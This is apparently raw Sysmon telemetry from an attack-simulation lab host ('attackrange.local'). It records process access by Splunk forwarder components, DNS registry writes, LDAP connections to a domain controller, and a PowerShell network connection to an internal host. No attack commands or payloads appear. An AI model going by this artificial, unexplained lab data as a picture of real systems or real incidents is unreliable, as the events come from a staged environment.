Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:43.574{B81B27B7-4F8B-613A-6E90-03000000C801}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035085670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:07.253{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56754-false10.0.1.12-8000- 734700x800000000000000035085669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:42.995{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 
(rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:44.926{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.911{B81B27B7-4F8C-613A-7090-03000000C801}1264C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.603{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07421487ED66D4099696AAAC244B13C9,SHA256=051A16AF05742B3A7360D2F6FA7A86F9FF59F262B36BE165A5E9286B5BE50BE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000035085695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.409{B81B27B7-4F8C-613A-6F90-03000000C801}42204780C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:44.256{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.256{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.241{B81B27B7-4F8C-613A-6F90-03000000C801}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:44.041{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5F4536D9CADE4FBA4DF0E27C388CE6EE,SHA256=65CD984BBF241B7E385A7A88F8AB35CB298E75C42EAB02383EBAE669305AACD6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2430B48CBBF039C08C685F7D2E7A0F9,SHA256=25DE01DB5ED9C4A30EDF3DDE51902A8C63BEA31E78C4616D4579FDBBEDC67BB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D2458A9118856FE824450620C91DA653,SHA256=017DCA6AF17E2B6AF81AC7D4AFE73481D6F12C388FE89498147B4B296204AA9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:45.263{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17F996CD8A5C2E5911B4DC962CEDCE58,SHA256=03A94A3D1DF895E61A0FE75DD08FB777F09109437D481228379C804872B73AAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.805{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56758-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.037{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56757-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:09.028{B81B27B7-4F1A-613A-5B90-03000000C801}6804C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local56756-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035085731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:08.952{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56755-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000035085730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000035085729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000035085728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000035085727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\FlagsDWORD (0x00000002) 13241300x800000000000000035085726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\TtlDWORD 
(0x000004b0) 13241300x800000000000000035085725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentPriUpdateToIpBinary Data 13241300x800000000000000035085724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\SentUpdateToIpBinary Data 13241300x800000000000000035085723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\DnsServersBinary Data 13241300x800000000000000035085722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\HostAddrsBinary Data 13241300x800000000000000035085721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\PrimaryDomainNameattackrange.local 13241300x800000000000000035085720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 
18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\AdapterDomainName(Empty) 13241300x800000000000000035085719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:16:45.010{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{ACF0E042-6EE8-44CF-93DA-B1C31E741B40}\Hostnamewin-host-987 13241300x800000000000000035085718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 